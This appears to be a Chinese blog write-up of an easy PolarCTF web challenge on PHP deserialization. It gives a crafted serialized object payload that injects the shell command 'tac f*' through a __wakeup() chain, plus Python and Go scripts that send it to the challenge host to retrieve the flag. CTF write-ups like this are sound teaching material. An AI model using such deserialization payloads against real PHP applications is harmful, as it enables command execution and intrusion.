Polar Web【简单】PHP反序列化初试

已于 2024-06-05 18:38:22 修改
阅读量655 收藏 3
点赞数 12
分类专栏: # CTF 文章标签: php 安全 web安全 CTF
于 2024-06-05 17:55:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45987327/article/details/139421344
版权

Polar Web【简单】PHP反序列化初试

Contents

思路

启动环境,显示下图中的PHP代码,于是展开分析:

  1. 首先发现Easy类中有魔术函数 __wakeup() ,实现的是对成员变量 $name 的回显。
  2. 观察下方发现, unserialize() 函数将触发该魔术函数的执行,因此考虑构造序列字符串传入该类的成员变量 $name 中,以触发命令执行。
  • 本题分别使用手动注入和脚本运行两种方式进行解答。

code

EXP

手动

manual
flag

脚本

Python
import requests


def attack(url, payload):
    url += payload
    res = (requests.get(url).content.decode('utf8'))
    if res:
        print(res[res.rindex('flag'):res.rindex('"')])


if __name__ == '__main__':
    site = 'http://~.www.polarctf.com:8090/'
    pl = '?easy=O:4:"Easy":1:{s:4:"name";O:4:"Evil":2:{s:4:"evil";s:6:"tac f*";s:3:"env";N;}}'
    attack(site, pl)
Go
package main

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)

func attack(url string) {
	//fmt.Println("url:", url)
	if resp, err := http.Get(url); err != nil {
		panic("GET ERR: " + err.Error())
	} else {
		out, _ := ioutil.ReadAll(resp.Body)
		ans := string(out)
		fmt.Println(ans[strings.LastIndex(ans, "flag"): strings.LastIndex(ans, "\"")])
	}
}

func main() {
	baseURL := "http://~.www.polarctf.com:8090/"
	// 解析基础 URL
	u, err := url.Parse(baseURL)
	if err != nil {
		panic(err)
	}
	// 解析查询字符串
	q, err := url.ParseQuery(u.RawQuery)
	if err != nil {
		panic(err)
	}
	// 添加或更新查询参数
	q.Set("easy", "O:4:\"Easy\":1:{s:4:\"name\";O:4:\"Evil\":2:{s:4:\"evil\";s:6:\"tac f*\";s:3:\"env\";N;}}")
	// 编码查询字符串
	u.RawQuery = q.Encode()
	attack(u.String())
}
  • !注意 !在Go语言中,为了防止特殊的字符导致URL被截断引发HTTP请求异常,需要对原生URL进行编码处理

运行&总结

run

  • 本题考查PHP代码分析、反序列化以及序列构造的技巧
  • 需要对PHP面向对象设计有所认识






敬,不完美的明天
_廿_尘
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 1788
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
Polar 2024春季个人挑战赛 Jay17 WP
Jay17的博客
03-24 1453
Polar 2024春季个人挑战赛 Jay17 WP Rank 7
PolarCTF-WEB-反序列化
weixin_63301206的博客
10-13 242
web安全php反序列化
PolarCTF春季个人挑战赛 2024 WEB
konpure的博客
03-27 1055
又是反序列化的题目,入口应该是Polar类中的__wakeup()魔术方法,反序列化过程中如果没有改变O的个数该方法会被优先调用,同时该方法中调用了一个不存在的方法hacker(),由此就会触发Night类中的__call类魔术方法,同时该方法中的echo语句又可实现将类当成字符串调用,以此触发__toString()魔术方法,由于该方法中将flag替换成了空,我们可以尝试使用双写绕过,具体POC如下。方法,形成变量覆盖,具体的poc如下。好好好,又是折腾半天没弄出来的,摆了,日后再补上。
写在前面的一些话:《Learning OpenCV》中文版 .
weiyinchao88
01-21 1668
2009-09-17 15:51 7578人阅读 评论(4) 收藏举报 <!-- /* Font Definitions */ @font-face {font-family:Helvetica; panose-1:2 11 5 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-...
写在前面的一些话:《Learning OpenCV》中文版
热门推荐
09-17 1万+
 <!--v/:* {behavior:url(#default#VML);}o/:* {behavior:url(#default#VML);}w/:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}--> Normal 0
PolarCodes-master_极化码_极化码构造_polarcode_
09-30
极化码(Polar Codes)是一种新兴的纠错编码技术,由土耳其科学家Erdal Arikan在2009年提出。这种编码方案以其独特的构造方式和理论基础——信道极化,为通信领域带来了革新。在本文中,我们将深入探讨极化码的基本...
Polar编码matlab程序
03-26
极化码(Polar Codes)是一种新兴的错误纠正编码技术,由土耳其科学家Erdal Arıkan在2009年提出。这种编码方法基于信道极化理论,能够达到香农理论中的信道容量,即在无限长的码块长度下实现零误码率传输。在实际...
GA.zip_GA_polar_polar code_信道极化_高斯近似算法
07-13
"GA.zip_GA_polar_polar code_信道极化_高斯近似算法"这个压缩包显然包含了与极化码和高斯近似算法相关的MATLAB实现。MATLAB是一种强大的编程环境,常用于科学计算和数据分析,尤其是信号处理和通信领域。 在压缩包...
Reducedfactorgraph1_极化码_极化码化简_matlab_polar_
10-02
在IT领域,尤其是在通信和编码理论中,极化码(Polar Codes)是一种创新的纠错编码技术,由Erdal Arikan教授于2009年提出。它们基于通道极化概念,能够在接近信道容量的情况下实现信道编码,这对无线通信、存储系统...
基于极化的缩短Polar码删余图样选择
01-19
该方案以极化效果保留为目的,选择次优子信道作为代价位,并以此代价位对应的输出位作为删余图样,再通过反馈调整代价位的值来获得缩短Polar码。仿真结果表明,在不同信道、不同码率条件下,由本文方法生成的缩短 ...
Java、python、php版的高考志愿填报辅助系统(源码、调试、LW、开题、PPT)
m0_72599287的博客
08-19 1205
高考志愿填报辅助系统采用Java、python、php三种语言做了三个不同的版本,每个版本的页面央视、功能模块都一样,具体如文中展示。
推荐一个完全自由的目录设计网站
最新发布
qq_30049249的博客
08-22 346
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 834
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
thinkphp5漏洞分析之文件包含
m0_68976043的博客
08-20 643
最后,再通过一张攻击流程图来回顾整个攻击过程。
linux 网卡配置
轻口味的专栏
08-21 1256
linux网卡可以通过命令和配置文件配置,如果是桌面环境还可以通过图形化界面配置.
62 网络设备的暗藏的操控者SNMP
qq_56248592的博客
08-19 138
一 SNMP 简介一 SNMP 简介SNMP(Simple Network Management Protocol,简单网络管理协议)广泛用于网络设备的。SNMP允许管理员通过NMS对网络上不同厂商、不同物理特性、采用不同互联技术的设备进行管理,包括状态监控、数据采集和故障处理。
matlab仿真polar 极化码
12-08
对于polar极化码的仿真,可以通过matlab来实现。首先,我们需要了解polar极化码的原理和编解码过程,然后利用matlab的编程功能,编写相应的程序来实现仿真。 在matlab中,我们可以使用矩阵运算来实现polar极化码的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_廿_尘

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值